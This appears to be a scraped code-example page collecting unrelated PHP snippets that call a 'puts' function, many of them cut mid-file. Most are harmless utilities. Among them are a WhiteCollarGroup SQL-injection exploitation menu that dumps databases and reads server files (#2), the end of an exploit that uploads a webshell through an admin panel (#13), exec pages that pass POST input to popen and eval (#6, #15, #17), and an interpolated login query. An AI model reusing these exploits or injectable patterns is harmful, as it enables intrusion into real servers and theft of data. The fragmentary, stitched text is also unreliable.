function processDatabases() {
	$confPath = __DIR__.'/../conf';
	$confs = findConfigurationFiles($confPath);
	
	foreach ($confs as $confFile) {
		$conf = json_decode(file_get_contents($confPath.'/'.$confFile));
		if (!$conf)
			puts("Not a valid json file:\n".file_get_contents($confFile));
		else {
			$filter = new DataFilter($conf);
			$filter->processDatabase();
		}
	}
}
Beispiel #2
0
function main($msg = null)
{
    global $token, $token_hex;
    echo "\n" . $msg . "\n";
    puts("[>] MAIN MENU");
    puts("[1] Browse MySQL");
    puts("[2] Run SQL Query");
    puts("[3] Read file");
    puts("[4] About");
    puts("[0] Exit");
    $resp = gets();
    if ($resp == "0") {
        exit;
    } elseif ($resp == "1") {
        // pega dbs
        $i = 0;
        puts("[.] Getting databases:");
        while (true) {
            $pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[!] Current database: " . runquery("SELECT database()"));
        puts("[?] Enter database name for select:");
        $own = array();
        $own['db'] = gets();
        $own['dbh'] = hex($own['db']);
        // pega tables da db
        $i = 0;
        puts("[.] Getting tables from {$own['db']}:");
        while (true) {
            $pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[?] Enter table name for select:");
        $own['tb'] = gets();
        $own['tbh'] = hex($own['tb']);
        // pega colunas da table
        $i = 0;
        puts("[.] Getting columns from {$own['db']}.{$own['tb']}:");
        while (true) {
            $pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1");
            if ($pega) {
                puts(" - " . $pega);
            } else {
                break;
            }
            $i++;
        }
        puts("[?] Enter columns name, separated by commas (\",\") for select:");
        $own['cl'] = explode(",", gets());
        // pega dados das colunas
        foreach ($own['cl'] as $coluna) {
            $i = 0;
            puts("[=] Column: {$coluna}");
            while (true) {
                $pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1");
                if ($pega) {
                    puts(" - {$pega}");
                    $i++;
                } else {
                    break;
                }
            }
            echo "\n[ ] -+-\n";
        }
        main();
    } elseif ($resp == "2") {
        puts("[~] RUN SQL QUERY");
        puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
        puts("[?] Query (enter for exit): ");
        $query = gets();
        if (!$query) {
            main();
        } else {
            main(runquery($query . "\n"));
        }
    } elseif ($resp == "3") {
        puts("[?] File path (may not have priv):");
        $file = hex(gets());
        $le = runquery("SELECT load_file({$file}) AS wc");
        if ($le) {
            main($le);
        } else {
            main("File not found, empty or no priv!");
        }
    } elseif ($resp == "4") {
        puts("Coded by WhiteCollarGroup");
        puts("www.wcgroup.host56.com");
        puts("*****@*****.**");
        puts("twitter.com/WCollarGroup");
        puts("facebook.com/WCollarGroup");
        puts("wcollargroup.blogspot.com");
        main();
    } else {
        main("[!] Wrong choice.");
    }
}
Beispiel #3
0
                        exit;
                    }
                } else {
                    //you had a valid login
                    // get TA ID and name for the entire session.
                    $sql = "select sid from login where username = '******' and password = '******'";
                    $result = $db->query($sql)->fetch();
                    $_SESSION['ta_id'] = $result[0];
                    $sql = "select name_first, name_last, department from ta where sid = '{$result['0']}'";
                    $result = $db->query($sql)->fetch();
                    $_SESSION['ta_name'] = $result['name_first'] . " " . $result['name_last'];
                    $_SESSION['tadept'] = $result['department'];
                    // go to next page.
                    session_regenerate_id(true);
                    session_write_close();
                    header("Location:info.php");
                    exit;
                }
            } catch (PDOException $e) {
                puts('Exception : ' . $e->getMessage());
                $db = NULL;
            }
        }
    }
}
//check user creds
?>


</html>
Beispiel #4
0
<?php

def_printfer('puts', "%s\n");
puts('base>');
_catch("first", function () {
    puts('1>');
    _catch("second", function () {
        puts('2>');
        _catch("third", function () {
            puts('3>');
            _throw("second");
            puts('<3');
        });
        puts('<2');
    });
    puts('<1');
});
puts('<base');
?>
---
base>
1>
2>
3>
<1
<base
	private function processTable($name) {
		puts("-----");
		puts("Processing table: $name");
		
		$stm = $this->source->execute("select * from $name");
		
		$count = $stm->rowCount();
		puts("Row count: $count");
		
		if($this->truncateTable($this->dest, $name))
			puts("Truncated destination table.");
		else
			puts("An error occured truncating destination table.");
			
		$strCols = $this->getColumnNames($stm, 'VAR_STRING', 'BLOB', 'TEXT');
		$allCols = $this->getColumnNames($stm);
		
		puts("Table columns: ".implode(', ', $allCols));
		puts("Filtered columns: ".implode(', ', $strCols));
			
		$insertStm = $this->prepareInsertStatement($this->dest, $name, $allCols);
		
		for ($i=0; $i<$count; $i++) {
//		for ($i=0; $i<min($count, 10); $i++) {

			echo '- ';
			$row = $stm->fetch(PDO::FETCH_BOTH);
			
			echo $row[0];
			echo ' | ';
			
			foreach ($strCols as $colname) {
				$row[$colname] = $this->filterValue($row[$colname]);
				echo substr($row[$colname], 0, 10);
				echo ' | ';
			}
			
//			puts(implode(', ', $this->getRowValues($row, $allCols)));
			
			if (!$insertStm->execute($this->getRowValues($row, $allCols)))
				throw new Exception('Unable to insert row: '.json_encode($row));
			
			puts (' ;');
		}
		
		puts("All rows inserted.");
	}
Beispiel #6
0
    putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin");
    putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " "));
    /* PHP scripts */
    $ph = popen($_POST['txtCommand'] . ' 2>&1', "r");
    while ($line = fgets($ph)) {
        echo htmlspecialchars($line);
    }
    pclose($ph);
    puts("&nbsp;</pre>");
}
if (!isBlank($_POST['txtPHPCommand'])) {
    puts("<pre>");
    require_once "config.inc";
    require_once "functions.inc";
    echo eval($_POST['txtPHPCommand']);
    puts("&nbsp;</pre>");
}
?>
<div id="niftyOutter">
<form action="exec.php" method="post" enctype="multipart/form-data" name="frmExecPlus" onsubmit="return frmExecPlus_onSubmit(this);">
	<table summary="exec">
		<tr>
		<td colspan="2" valign="top" class="vnsepcell"><?php 
echo gettext("Execute Shell command");
?>
</td>
		</tr>
		<tr>
			<td class="label" align="right"><?php 
echo gettext("Command");
?>
Beispiel #7
0
function try_again($str, $str2, $str3)
{
    puts("");
    //reset the modal
    login_form($str, $str2, $str3);
}
Beispiel #8
0
        $prefix = file_get_contents($dir . 'prefix');
    }
    if (file_exists($dir . 'suffix')) {
        $suffix = file_get_contents($dir . 'suffix');
    }
    foreach (test_files($dir) as $file) {
        $total++;
        list($src, $result) = read_test($file);
        $result = trim($result);
        $eval_out = trim(eval_output($prefix . $src . $suffix));
        if ($eval_out == $result) {
            $correct++;
            echo '.';
        } else {
            add_error($file, $eval_out, $result);
            $fail++;
            echo 'e';
        }
    }
}
print_all_errors();
if ($fail) {
    Color::red();
} else {
    Color::green();
}
puts("Correct: " . $correct);
puts("Fail: " . $fail);
puts("Total: " . $total);
Color::reset();
unlink('tmp.php');
Beispiel #9
0
function red($text, $line_break = true)
{
    puts($text, RED, $line_break);
}
Beispiel #10
0
 /**
  * Show a nice list of statistics such as the amount of requirements, failed tests, etc.
  *
  * @author Yorick Peterse
  * @access Private
  * @static
  * @return Void
  */
 private static function show_statistics()
 {
     $tests = Colors::blue("Tests: " . self::$statistics['tests']);
     $failed = Colors::red("Failed: " . self::$statistics['tests_failed']);
     $success = Colors::green("Success: " . (self::$statistics['tests'] - self::$statistics['tests_failed']));
     $reqs = "Requirements: " . self::$statistics['requirements'];
     puts(PHP_EOL . "{$reqs} | {$tests} | {$success} | {$failed}");
 }
                    } elseif ($c == "'" || $c == '"') {
                        // start of quoted string?
                        $quoted = TRUE;
                        $quote = $c;
                        $line .= $c;
                        $slash = FALSE;
                    } else {
                        $line .= $c;
                    }
                }
            }
        }
    }
}
if (!empty($line)) {
    puts(trim($line) . "\n");
    $line = '';
}
exit(0);
function getchar()
{
    return fgetc(STDIN);
}
function puts($s)
{
    return fwrite(STDOUT, $s, strlen($s));
}
function debug($s)
{
    return;
    fwrite(STDERR, $s, strlen($s));
Beispiel #12
0
 function to_code($ast, $t = '-')
 {
     if (D) {
         puts($t . 'AST:', $ast);
     }
     if (is_array($ast) && count($ast) == 1 && !$this->get_method(pos($ast))) {
         $ast = pos($ast);
     }
     //IS IT AN ATOM?
     if (!is_array($ast)) {
         //is it a float or negative number?
         $f = str_replace(array('__DOT', '__DSH'), array('.', '-'), $ast);
         if (is_numeric($f)) {
             return $f;
         }
         return $this->get_var($ast) && !is_numeric($ast) ? '$' . $ast : $ast;
     }
     //IS IT A SINGLE LIST?
     if (!is_array(pos($ast))) {
         $ast = array($ast);
     }
     //CREATE PARSED AST
     $code = array();
     $special_forms = array('__quote', 'lambda', 'define', 'cond', 'if', 'and', 'or', 'not', 'iapply');
     foreach ($ast as $node) {
         if (D) {
             puts(N, $t . 'CHECK:', $node, N);
         }
         $method = array_shift($node);
         if (in_array($method, $special_forms)) {
             $args = $node;
             $method = '__' . $method;
         } else {
             $args = array();
             foreach ((array) $node as $arg) {
                 $args[] = $this->to_code($arg);
             }
             if (D) {
                 puts('BLIND', $args);
             }
         }
         $code[] = $this->{$method}(empty($args) ? NULL : $args);
     }
     return count($code) == 1 ? array_shift($code) : $code;
 }
Beispiel #13
0
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack");
curl_exec($ch);
// get doc type id
puts("Trying to get new doc type ID.");
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes");
$store = curl_exec($ch);
$numbers = array();
preg_match_all("/main\\.php\\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers);
$tid = $numbers[1][0];
puts("New doc type ID: {$tid}", "[!]");
// upload file
puts("Trying to upload file...");
curl_setopt($ch, CURLOPT_POST, 1);
$post = array("task" => "addfile", "client_id" => $uid, "from" => "step1", "project_id" => $pid, "clid" => $uid, "task_id" => $taskid, "type_id" => $tid, "file_title" => "wcgroup", "file" => "@{$webshell}");
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);
// make file address
puts("Thinking about file address...");
$fileaddr = $target . "/clientdir/{$uid}/dl/" . basename($webshell);
puts("Exploit complete.", "[!]");
puts("You have now a webshell in <{$fileaddr}>", "[i]");
function puts($str, $type = false)
{
    if (!$type) {
        $type = "[*]";
    }
    echo $type . "  " . $str . "\n";
}
Beispiel #14
0
                                print 'neutral';
                            }
                        }
                        //value == 50
                        print '"><td>' . $p->ta . '</td></tr>';
                    }
                    //don't print out blanks
                }
                //print out each TA
                print '</tbody></table>';
            }
            //when we have a match, display the results.
        }
        //getting rows from pref.csv
        fclose($fp);
    } else {
        puts($status);
    }
}
?>

<script>
  function redirectMe (sel) { 
    var url = sel[sel.selectedIndex].value;
    window.location = url; 
  }

</script>
			
</body></html>
Beispiel #15
0
    puts("<div class=\"panel panel-success responsive\"><div class=\"panel-heading\"><h2 class=\"panel-title\">PHP Response</h2></div>");
    $tmpname = tempnam("/tmp", "");
    $phpfile = fopen($tmpname, "w");
    fwrite($phpfile, "<?php\n");
    fwrite($phpfile, "require_once(\"/etc/inc/config.inc\");\n");
    fwrite($phpfile, "require_once(\"/etc/inc/functions.inc\");\n\n");
    fwrite($phpfile, $_POST['txtPHPCommand'] . "\n");
    fwrite($phpfile, "?>\n");
    fclose($phpfile);
    $output = array();
    exec("/usr/local/bin/php " . $tmpname, $output);
    unlink($tmpname);
    $output = implode("\n", $output);
    print "<pre>" . htmlspecialchars($output) . "</pre>";
    //		echo eval($_POST['txtPHPCommand']);
    puts("</div>");
    ?>
<script type="text/javascript">
//<![CDATA[
	events.push(function() {
		// Scroll to the bottom of the page to more easily see the results of a PHP exec command
		$("html, body").animate({ scrollTop: $(document).height() }, 1000);
	});
//]]>
</script>
<?php 
}
?>
	<div class="panel panel-default responsive">
		<div class="panel-heading"><h2 class="panel-title"><?php 
echo gettext('Execute PHP Commands');
Beispiel #16
0
<?php

require_once "plivo.php";
$auth_id = "Your AUTH_ID";
$auth_token = "Your AUTH_TOKEN";
$p = new RestAPI($auth_id, $auth_token);
# API ID is returned for every API request.
# Request UUID is request id of the call. This ID is returned as soon as the call is fired irrespective of whether the call is answered or not
$params = array('to' => '2222222222', 'from' => '1111111111', 'answer_url' => "https://glacial-harbor-8656.herokuapp.com/testing.php/speak", 'answer_method' => "GET");
# Make an outbound call
$response = $p->make_call($params);
puts("API ID : #{$response['api_id']}");
puts("Request UUID : #{$response['request_uuid']}");
/* 
Sample Output
API ID : 32cba792-ae01-11e4-b153-22000abcaa64 
Request UUID : 5b2db3d3-f478-4b63-992c-e47c527572e8 
*/
# Call UUID is th id of a live call. This ID is returned only after the call is answered.
$params1 = array('status' => 'live');
# Get the details of all live calls
$response = $p->get_live_calls($params1);
$uuids = $response['response']['calls'];
// Looping through the call uuids
foreach ($uuids as $value) {
    print_r("Call UUID : {$value} <br>");
}
/*
Sample Output
Call UUID : a60f44dc-926f-11e4-82f5-b559cbfe39b9
Call UUID : af399206-926f-11e4-8b6f-fd067af138be
Beispiel #17
0
    putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin");
    putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " "));
    /* PHP scripts */
    $ph = popen($_POST['txtCommand'], "r");
    while ($line = fgets($ph)) {
        echo htmlspecialchars($line);
    }
    pclose($ph);
    puts("</pre>");
}
if (!isBlank($_POST['txtPHPCommand'])) {
    puts("<pre>");
    require_once "config.inc";
    require_once "functions.inc";
    echo eval($_POST['txtPHPCommand']);
    puts("</pre>");
}
?>
<div id="niftyOutter">
<form action="exec.php" method="POST" enctype="multipart/form-data" name="frmExecPlus" onSubmit="return frmExecPlus_onSubmit( this );">
  <table>
	<tr>
	  <td colspan="2" valign="top" class="vnsepcell">Bir kabuk komutu çalıştır</td>
	</tr>  
    <tr>
      <td class="label" align="right">Komut:</td>
      <td class="type"><input id="txtCommand" name="txtCommand" type="text" size="80" value="<?php 
echo htmlspecialchars($_POST['txtCommand']);
?>
"></td>
    </tr>
Beispiel #18
0
def('say_two', function () {
    puts("Me: two");
});
say_two();
// Me: two
def_alias('say_one', 'say_two');
say_two();
// Me: one
////////////////////////////////////////
def_printfer('test_let', "calling outside let \n");
test_let();
// calling outside let
deflet(function () {
    def_printfer('test_let', "calling inside let \n");
    test_let();
    // calling inside let
});
test_let();
// calling outside let
////////////////////////////////////////
# using namespace
def('foo\\bar\\hello', function () {
    echo "Hello, World!\n";
});
foo\bar\hello();
// Hello, World!
////////////////////////////////////////
# Testing def_return
def_return('user_name', 'waserd');
puts(user_name());
// waserd